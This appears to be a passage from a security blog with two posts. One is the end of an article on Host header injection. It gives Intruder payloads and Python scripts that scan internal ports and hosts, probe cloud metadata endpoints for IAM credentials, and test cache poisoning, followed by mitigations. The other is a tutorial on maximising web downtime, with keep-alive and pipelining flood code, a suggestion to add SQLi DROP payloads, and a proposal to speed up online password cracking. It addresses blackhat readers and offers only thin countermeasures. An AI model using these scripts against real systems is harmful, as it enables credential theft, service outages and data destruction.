  3. Rotate through different ports, using the vulnapp.com internal IP, if applicable.
  4. Rotate through different internal IPs in the same domain, if applicable.
  5. Rotate through different protocols (may not always work).
  6. Brute-force directories on identified DMZ hosts.

Burp Intruder — scanning surrounding hosts

GET / HTTP/1.1
Host: 192.168.1.§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

Burp Intruder — port scanning surrounding hosts

GET / HTTP/1.1
Host: 192.168.1.1:§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

Burp Intruder — port scanning localhost

GET / HTTP/1.1
Host: 127.0.0.1:§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
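The same rotation can be scripted outside of Intruder. The sketch below is a hedged example: the inner host and port list are hypothetical payload choices, and responses that differ in size or status line hint at open internal ports behind the vulnerable front end.

```python
import socket

PORTS = [22, 80, 443, 3306, 8080, 8443]  # example payload set

def build_scan_request(inner_host: str, port: int) -> bytes:
    """One Intruder-style payload: the port marker rotated inside Host."""
    return (
        "GET / HTTP/1.1\r\n"
        f"Host: {inner_host}:{port}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()

def scan_via_host_header(target_ip: str, target_port: int, inner_host: str):
    """Send every payload to the vulnerable front end and record the response
    size per port; outliers are candidates for open internal services."""
    results = {}
    for port in PORTS:
        with socket.create_connection((target_ip, target_port), timeout=5) as s:
            s.sendall(build_scan_request(inner_host, port))
            results[port] = len(s.recv(65536))
    return results
```

As with Intruder, the analysis step is manual: sort the results and investigate the ports whose responses stand out.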

Modern Attack Vectors (2026 Update)

Since the original publication of this article, several high-impact attack surfaces have emerged that directly exploit ESI/OfBRL primitives:

Cloud metadata endpoint exploitation

Cloud providers expose instance metadata via link-local addresses. When a vulnerable application can be coerced into making requests to these endpoints via Host header injection, an attacker can extract IAM credentials, service account tokens, instance identity documents, and network configuration details.

GET / HTTP/1.1
Host: 169.254.169.254
# AWS IMDSv1 - returns IAM role credentials

GET / HTTP/1.1
Host: metadata.google.internal
# GCP - returns service account tokens

GET / HTTP/1.1
Host: 169.254.169.254
Metadata: true
# Azure - requires the Metadata header (may not work via Host injection alone)
Mitigation: AWS IMDSv2 mitigates this by requiring a PUT request with a TTL-bounded token (hop limit = 1). GCP Compute VMs support a similar metadata concealment mechanism. Ensure your cloud instances enforce these protections.
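To make the mitigation concrete, here is a minimal sketch of the two-step IMDSv2 handshake using only the Python standard library. The endpoints and header names are the AWS-documented ones; the point is that step 1 is a PUT with a custom header, which a bare Host header injection cannot normally produce.

```python
import urllib.request

IMDS = "http://169.254.169.254"  # AWS link-local metadata address

def build_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """IMDSv2 step 1: request a session token via PUT. A Host-header-only
    SSRF primitive cannot issue this PUT, which is what blocks the attack."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )

def build_metadata_request(token: str,
                           path: str = "/latest/meta-data/") -> urllib.request.Request:
    """IMDSv2 step 2: present the token on every metadata read."""
    return urllib.request.Request(
        IMDS + path, headers={"X-aws-ec2-metadata-token": token}
    )

# On an EC2 instance you would then do, e.g.:
#   token = urllib.request.urlopen(build_token_request(), timeout=2).read().decode()
#   data  = urllib.request.urlopen(build_metadata_request(token), timeout=2).read()
```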

Container and Kubernetes exploitation

In containerized environments, the application server often has network access to internal Kubernetes services that are never meant to be internet-facing:

GET / HTTP/1.1
Host: kubernetes.default.svc:443
# K8s API server - may leak secrets, pod specs, RBAC config

GET / HTTP/1.1
Host: 127.0.0.1:15000
# Envoy sidecar admin - config dump, cluster endpoints, stats

GET / HTTP/1.1
Host: 127.0.0.1:9090
# Prometheus metrics - may expose internal service topology
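A short helper can rotate through these well-known internal candidates. The candidate list below uses common defaults and is only a starting point; adjust it to the environment under test.

```python
# Candidate internal targets worth rotating through the Host header
# (well-known defaults; purely illustrative, not exhaustive).
INTERNAL_CANDIDATES = [
    "kubernetes.default.svc:443",  # K8s API server
    "127.0.0.1:15000",             # Envoy sidecar admin
    "127.0.0.1:9090",              # Prometheus
    "169.254.169.254",             # cloud metadata
]

def build_internal_probe(candidate: str) -> bytes:
    """A single Host-injection probe aimed at one internal candidate."""
    return (
        "GET / HTTP/1.1\r\n"
        f"Host: {candidate}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()

def all_probes():
    """Yield (candidate, raw request) pairs ready to send to the front end."""
    for candidate in INTERNAL_CANDIDATES:
        yield candidate, build_internal_probe(candidate)
```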

Practical cache poisoning (Kettle, 2018)

James Kettle's 2018 PortSwigger research on practical web cache poisoning significantly expanded the attack surface understanding for Host header injection. His work demonstrated that unkeyed HTTP headers (such as X-Forwarded-Host and X-Forwarded-Scheme, and in some misconfigurations the Host header itself) can be used to poison shared caches (CDNs, reverse proxies) at scale, affecting all users served by the poisoned cache entry. This research formalized a previously theoretical technique into a repeatable, high-impact attack chain.

[Figure: Step 1 - the attacker sends Host: evil.com to the vulnerable app, whose response has its links rewritten to evil.com. Step 2 - the shared cache / CDN / proxy stores the poisoned response for /. Step 3 - legitimate users A, B, and C are all served the poisoned content until the cache TTL expires or the entry is manually purged.]
Figure 4 — Cache poisoning via Host header injection
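A cache poisoning experiment can be kept safe with a cache buster, as Kettle's methodology recommends. The sketch below assumes a hypothetical target URL and uses X-Forwarded-Host as the candidate unkeyed header; the functions are illustrative, not a turnkey exploit.

```python
import urllib.request
import uuid

def buster_url(base: str) -> str:
    """Append a unique cache-buster parameter so the experiment only poisons
    our own cache entry, never one served to real users."""
    sep = "&" if "?" in base else "?"
    return f"{base}{sep}cb={uuid.uuid4().hex}"

def probe_unkeyed_header(url: str, header: str = "X-Forwarded-Host",
                         value: str = "evil.example") -> bool:
    """Seed the cache with the header set, then re-fetch without it; if the
    value still comes back, the header is unkeyed and the entry is poisoned."""
    poisoned = urllib.request.Request(url, headers={header: value})
    urllib.request.urlopen(poisoned, timeout=5).read()   # seed the cache
    clean = urllib.request.urlopen(url, timeout=5).read()  # fetch without header
    return value.encode() in clean

# Example (authorized testing only; hypothetical target):
#   probe_unkeyed_header(buster_url("https://vulnapp.com/"))
```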

What Can You Do

The full exploitation analysis — this vulnerability can be used in the following ways:

  1. Bypass restrictive UTM ACLs
  2. Bypass restrictive WAF rules
  3. Bypass restrictive firewall ACLs
  4. Perform cache poisoning
  5. Fingerprint internal infrastructure
  6. Perform DoS exploiting IP trust
  7. Exploit applications hosted on the same machine (multiple app loads)
  8. Extract cloud IAM credentials via metadata endpoints
  9. Map Kubernetes cluster topology via internal service discovery
  10. Exfiltrate data through DNS-based out-of-band channels

The impact of a maliciously constructed response can be magnified if it is cached either by a shared web cache or the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers or CDNs, then all users of that cache will continue to receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, that user will continue to receive the malicious content until the cache entry expires [5].

What Can't You Do

You cannot perform XSS or CSRF exploiting this vulnerability, unless certain conditions apply (e.g. the poisoned response injects attacker-controlled JavaScript into a cached page, or the application reflects the Host header value into HTML output without encoding).
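Whether that reflection precondition holds can be checked quickly. The sketch below sends a harmless canary value in the Host header and looks for it in the response body; the canary string is an arbitrary marker, not a real exploit payload, and the target values are placeholders.

```python
import http.client

CANARY = "canary-h0st-reflect.example"  # arbitrary marker value

def reflects_host(target_ip: str, port: int = 80, path: str = "/") -> bool:
    """Return True when the app echoes the raw Host header into the body,
    the precondition for turning cache poisoning into XSS."""
    conn = http.client.HTTPConnection(target_ip, port, timeout=5)
    conn.request("GET", path, headers={"Host": CANARY})
    body = conn.getresponse().read().decode(errors="replace")
    conn.close()
    return CANARY in body
```

A True result only shows reflection; whether it is exploitable also depends on output encoding and on what the cache keys on.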

The Fix (Updated)

If the ability to trigger arbitrary ESI or OfBRL is not intended behavior, then you should implement a whitelist of permitted URLs, and block requests to URLs that do not appear on this whitelist [6]. Running host integrity checks is also recommended.

Review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.

More specifically, we can:

  1. Apply egress filtering on the DMZ
  2. Apply egress filtering on the host (iptables/nftables rules, or cloud security group outbound rules)
  3. Apply whitelist IP restrictions in the application
  4. Apply blacklist restrictions in the application (not recommended — incomplete by nature)
  5. Validate and normalize the Host header at the reverse proxy layer before it reaches the application (e.g. Nginx server_name directive with explicit hostnames, reject requests with unknown Host values)
  6. Use X-Forwarded-Host with strict allowlisting rather than trusting the raw Host header — and ensure the reverse proxy strips any client-supplied X-Forwarded-* headers before adding its own
  7. Enforce IMDSv2 on cloud instances (hop limit = 1, PUT-based token acquisition) to block Host header SSRF to metadata endpoints
  8. Apply Kubernetes NetworkPolicies to restrict pod-to-pod and pod-to-service communication to only what's necessary
  9. Deploy egress proxies for any application that legitimately needs to make outbound HTTP requests — force all outbound traffic through a proxy with domain allowlisting
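Mitigation 3 can be sketched as framework-agnostic WSGI middleware; this is a minimal illustration, and the hostnames in the allowlist are hypothetical.

```python
# Minimal sketch: strict Host allowlisting inside the application, as WSGI
# middleware. Hostnames below are placeholders for your own deployment.
ALLOWED_HOSTS = {"vulnapp.com", "www.vulnapp.com"}

def host_allowlist(app):
    """Wrap a WSGI app so requests with an unknown Host header are refused."""
    def middleware(environ, start_response):
        # Strip any port; note this simple split does not handle IPv6 literals.
        host = environ.get("HTTP_HOST", "").split(":")[0].lower()
        if host not in ALLOWED_HOSTS:
            start_response("421 Misdirected Request",
                           [("Content-Type", "text/plain")])
            return [b"Unknown Host header\n"]
        return app(environ, start_response)
    return middleware
```

421 Misdirected Request is a reasonable status choice here, since it tells the client the request was routed to a server not configured for that authority.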

23/07/2019

Web DDoSPedia: A Million Requests


Web Application Denial of Service Next Level

In this tutorial we are going to talk about how to cause maximum downtime (including operational recovery processes) in anything that uses the word Web; this is also known as a Denial of Service attack. I do not recommend or approve using this knowledge for malicious purposes, and I take no accountability for how you use it. That is why I also provide countermeasures at the end of the post.

What Is The Landscape

In the past we have seen many Denial of Service attacks, but most of them were not very sophisticated. A very good example would be the Low Orbit Ion Cannon (LOIC). LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.[2]

As stated in a previous post, all these attacks do not really take advantage of the layer-7 complexity of the Web, and are therefore not as effective as they could be. A very good post exists on the Cloudflare blog named Famous DDoS Attacks [3].

A few of the famous attacks are:
  • The 2016 Dyn attack
  • The 2015 GitHub attack
  • The 2013 Spamhaus attack
  • The 2000 Mafiaboy attack
  • The 2007 Estonia attack

Improving DoS and DDoS attacks

In order to improve, or to understand better what is possible while conducting, a DoS attack, we have to think like a Web Server, be a Web Server, breathe like a Web Server!!


Well, what does a server breathe? HTTP, of course. So what if we make the Web Server start breathing a lot of HTTP/S? That would be amazing.

This is how we can overdose a web server with HTTP:
  1. HTTP Connection reuse
  2. HTTP Pipelining
  3. Single SSL/TLS handshake  
But let's go a step further and expand on that: what else can we do to increase the impact? Profile the server, of course, and adjust the traffic to something that is expensive to process, e.g. abuse vulnerable file upload functionality, SQLi attacks with DROP statements, etc.


HTTP Connection Reuse

HTTP persistent connection, also called HTTP keep-alive, or HTTP connection reuse, is the idea of using a single TCP connection to send and receive multiple HTTP requests/responses, as opposed to opening a new connection for every single request/response pair.

The newer HTTP/2 protocol uses the same idea and takes it further to allow multiple concurrent requests/responses to be multiplexed over a single connection.

In HTTP 1.0, connections are not considered persistent unless a keep-alive header is included, although there is no official specification for how keep-alive operates. It was, in essence, added to an existing protocol. If the client supports keep-alive, it adds an additional header to the request:
Connection: keep-alive
Then, when the server receives this request and generates a response, it also adds a header to the response:
Connection: keep-alive
Following this, the connection is not dropped, but is instead kept open. When the client sends another request, it uses the same connection. This will continue until either the client or the server decides that the conversation is over, and one of them drops the connection.

In HTTP 1.1, all connections are considered persistent unless declared otherwise. The HTTP persistent connections do not use separate keepalive messages, they just allow multiple requests to use a single connection.

If the client does not close the connection when all of the data it needs has been received, the resources needed to keep the connection open on the server will be unavailable for other clients. How much this affects the server's availability and how long the resources are unavailable depend on the server's architecture and configuration.

Yes, dear reader, I know what you are thinking: how can you, the humble hacker, the humble whitehat reader, use this knowledge to bring down your home web server for fun? Well, there is good news.

In Python, the urllib3 library provides various functions for instantiating HTTP keep-alive connections, such as ConnectionPools.

Here is a code chunk to look through:

from urllib3 import HTTPConnectionPool
[...omitted...]
urllib3.connectionpool.make_headers(keep_alive=None, accept_encoding=None, user_agent=None, basic_auth=None)
[...omitted...]

Parameters:
  • keep_alive – If True, adds ‘connection: keep-alive’ header.
  • accept_encoding – Can be a boolean, list, or string. True translates to ‘gzip,deflate’. List will get joined by comma. String will be used as provided.
  • user_agent – String representing the user-agent you want, such as “python-urllib3/0.6”
  • basic_auth – Colon-separated username:password string for ‘authorization: basic ...’ auth header.
Note: If you are a proxy person, you can use the Match and Replace functionality in Burp Pro Suite to add or replace the keep-alive header. But then your client (aka the browser) would have to know how to handle the received content. Better to write a Python template to handle the interaction.
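Putting the above together, a minimal keep-alive hammer needs nothing beyond the standard library. This is a sketch for testing your own server: host, port, and request count are placeholders.

```python
import http.client

def hammer_keepalive(host: str, port: int, path: str = "/", n: int = 100):
    """Send n sequential requests over a single persistent connection,
    instead of paying the TCP (and TLS) setup cost n times."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    statuses = []
    for _ in range(n):
        conn.request("GET", path, headers={"Connection": "keep-alive"})
        resp = conn.getresponse()
        resp.read()  # drain the body so the socket can be reused
        statuses.append(resp.status)
    conn.close()
    return statuses
```

Against an HTTP/1.1 server this reuses one socket for the whole run; run several of these in parallel and the server starts "breathing" a lot of HTTP.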

HTTP Pipelining

HTTP pipelining is a technique in which multiple HTTP requests are sent on a single TCP (transmission control protocol) connection without waiting for the corresponding responses. The technique was superseded by multiplexing via HTTP/2, which is supported by most modern browsers.

See the following diagram for pipelining:



HTTP pipelining requires both the client and the server to support it. HTTP/1.1-conforming servers are required to support pipelining (pipelining was introduced in HTTP/1.1 and was not present in HTTP/1.0). This does not mean that servers are required to pipeline responses, but that they are required not to fail if a client chooses to pipeline requests. Interesting behavior!

Note: Most of the servers execute requests from pipelining clients in the same fashion they would from non-pipelining clients. They don’t try to optimize it.
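Pipelining itself is easy to demonstrate with a raw socket: write all the requests in one burst, then read. The helper below builds the pipelined byte string; the host and paths are placeholders for your own test server.

```python
import socket

def build_pipeline(host: str, paths) -> bytes:
    """Concatenate several requests into one write; only the last request
    asks the server to close the connection."""
    out = []
    for i, path in enumerate(paths):
        last = i == len(paths) - 1
        out.append(
            f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Connection: {'close' if last else 'keep-alive'}\r\n\r\n"
        )
    return "".join(out).encode()

def pipeline(host: str, port: int, paths) -> bytes:
    """Send all requests back-to-back without waiting for any response."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(build_pipeline(host, paths))  # the whole burst in one write
        chunks = []
        while (data := s.recv(65536)):
            chunks.append(data)
    return b"".join(chunks)

# Example (your own test server):
#   pipeline("localhost", 8000, ["/a", "/b", "/c"])
```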



Again, yes, dear reader, I know what you are thinking: how can you, the humble blackhat hacker, the humble hacktivist reader, use this knowledge to bring down your home web server for fun? Well, there is more good news.



Some Python frameworks do support HTTP/2 (the successor to HTTP pipelining), Mouxaxaxa. As of late 2017 there are two Python frameworks that directly support HTTP/2, namely Twisted and Quart, with only the latter supporting server push.

Quart can be installed via pipenv or pip:

$ pipenv install quart
$ pip install quart

This requires Python 3.7.0 or higher (see python version support for reasoning).

A minimal Quart example is:

from quart import make_response, Quart, render_template, url_for

app = Quart(__name__)

@app.route('/')
async def index():
    result = await render_template('index.html')
    response = await make_response(result)
    response.push_promises.update([
        url_for('static', filename='css/bootstrap.min.css'),
        url_for('static', filename='js/bootstrap.min.js'),
        url_for('static', filename='js/jquery.min.js'),
    ])
    return response

if __name__ == '__main__':
    app.run(
        host='localhost', 
        port=5000, 
        certfile='cert.pem', 
        keyfile='key.pem',
    )

Another library that supports HTTP/2 connectivity from Python is hyper. hyper is a Python HTTP/2 library, as well as a very serviceable HTTP/1.1 library.

To begin, you will need to install hyper. This can be done like so:


$ pip install hyper

From the terminal you can launch a request by typing:

>>> from hyper import HTTPConnection
>>> c = HTTPConnection('http2bin.org')
>>> c.request('GET', '/')
1
>>> resp = c.get_response()

Used in this way, hyper behaves exactly like the classic http.client Python client. You can make sequential requests using the exact same API you’re accustomed to. The only difference is that HTTPConnection.request() may return a value, unlike the equivalent http.client function. If present, the return value is the HTTP/2 stream identifier.

In HTTP/2, connections are divided into multiple streams (multiplexing). Each stream carries a single request-response pair. You may start multiple requests before reading the response from any of them, and switch between them using their stream IDs.

Note: Be warned: hyper is in a very early alpha. You will encounter bugs when using it. If you do use the library, please provide feedback about potential issues to the creator.

Making Sense

By dramatically increasing the number of payloads per second sent to the server, we increase the chance of crashing the system, for the following reasons:
  • Multiple HTTP/2 connections sending requests such as the following would cause significant resource allocation, both in the server and the database:
    • File upload requests, with large files to be uploaded.
    • File download requests, with large files to be downloaded.
    • POST and GET requests containing exotic Unicode encoding, e.g. %2e%2e%5c etc.
    • POST and GET requests while performing intelligent fuzzing.
  • Enforcement of a single SSL/TLS handshake:
    • Not much to be said here. Simply enforce a single TLS handshake when the malicious payloads are going to consume more resources than the handshake itself. This will cause the server to consume resources.
Note: This type of attack can also be used as a diversion to hide other types of attacks, such as SQLi etc.

The diagram below demonstrates where the system is potentially going to crash first:



Other Uses of This Tech

We can use this knowledge to perform the following tasks:
  • Optimize Web App Scans
  • Optimize directory enumeration
  • Optimize online password cracking on Web Forms
  • Optimize manual SQLi attacks 
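As an example of the optimization angle, directory enumeration can ride a single persistent connection instead of reconnecting per word. This is a sketch; the host and wordlist are placeholders for your own authorized target.

```python
import http.client

def enumerate_dirs(host: str, wordlist, port: int = 80):
    """Probe /word/ paths over one keep-alive connection and return the
    (path, status) pairs that did not answer 404."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    found = []
    for word in wordlist:
        path = "/" + word.strip("/") + "/"
        conn.request("GET", path, headers={"Connection": "keep-alive"})
        resp = conn.getresponse()
        resp.read()  # drain so the socket can be reused
        if resp.status != 404:
            found.append((path, resp.status))
    conn.close()
    return found
```

The same one-connection pattern applies to online password guessing against web forms: swap the GET for a POST and the wordlist for credentials.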


Useful Tools 

There are some tools out there that make use of some of the principles mentioned here:
  • Turbo Intruder - https://github.com/PortSwigger/turbo-intruder - Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. It's intended to complement Burp Intruder by handling attacks that require exceptional speed, duration, or complexity.
  • Skipfish - https://code.google.com/archive/p/skipfish/ - Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes.
Countermeasures

Things to do to avoid these types of attacks:
  • Firewall HTTP state filtering rules
  • Firewall HTTPS state filtering rules
  • Firewall HTTP/2 blockage - although not recommended
  • WAF that checks the following:
    • User agent - check for agent spoofing
    • Request parameters - check for fuzzing
    • Request size checks
That is it folks have fun.......



References: 
  1.  https://stackoverflow.com/questions/25239650/python-requests-speed-up-using-keep-alive
  2.  https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
  3.  https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/
  4. https://en.wikipedia.org/wiki/HTTP_persistent_connection 
  5. https://2.python-requests.org/en/master/user/advanced/#keep-alive
  6. https://urllib3.readthedocs.io/en/1.0.2/pools.html
  7. https://stackoverflow.com/questions/19312545/python-http-client-with-request-pipelining
  8. https://www.freecodecamp.org/news/million-requests-per-second-with-python-95c137af319/
  9. https://www.python.org/downloads/
  10. https://txzone.net/2010/02/python-and-http-pipelining/
  11. https://gitlab.com/pgjones/quart
  12. https://gitlab.com/pgjones/quart/blob/master/docs/http2_tutorial.rst
  13. https://hyper.readthedocs.io/en/latest/
